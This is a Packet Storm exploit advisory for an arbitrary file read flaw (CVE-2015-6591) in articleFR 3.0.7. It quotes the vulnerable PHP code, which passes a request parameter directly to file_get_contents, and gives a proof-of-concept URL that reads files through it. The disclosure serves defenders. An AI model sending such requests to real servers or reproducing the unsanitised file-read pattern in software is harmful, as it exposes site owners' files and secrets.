articleFR version 3.0.l7 suffers from an arbitrary file read vulnerability.
f5c21447e511ce77030ac064707ce1de30ed4c18d8ee7ddeeede4dc751d03f3c# Exploit Title: articleFR any file read vulnerability in v3.0.7
# Date: 2015-09-06
# Vendor: Free Reprintables
# Exploit Author: cfreer & 0keeTeam
# Product web page: http://www.freereprintables.com
# Version: 3.0.7
# CVE : CVE-2015-6591
Details of the vulnerability are as follows:
Affected version: Version 3.0.7 and before.
Discover date:2015/9/6
Tested on: Apache/2.4.7 (Win32)
===================================================
The vulnerable parameter is ‘s’ ( in
articleFR\application\templates\amelia\loadjs.php). Finally, Parameter ‘s’
was directly into the function of file_get_contents.
<?
header('Content-Type: application/javascript');
$_content = file_get_contents($_GET['s']);
$_content = preg_replace('/(' . $_GET['h'] . ')/sim', $_GET['r'],
$_content);
print $_content;
exit;
?>
Proof of Concept:
=================================================================================================
http://127.0.0.1/articleFR/application/templates/amelia/loadjs.php?h=cfreer&r=0keeTeam&s=loadjs.php
=================================================================================================
referer: https://github.com/poc-lab/exp/blob/master/CVE-2015-6591
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed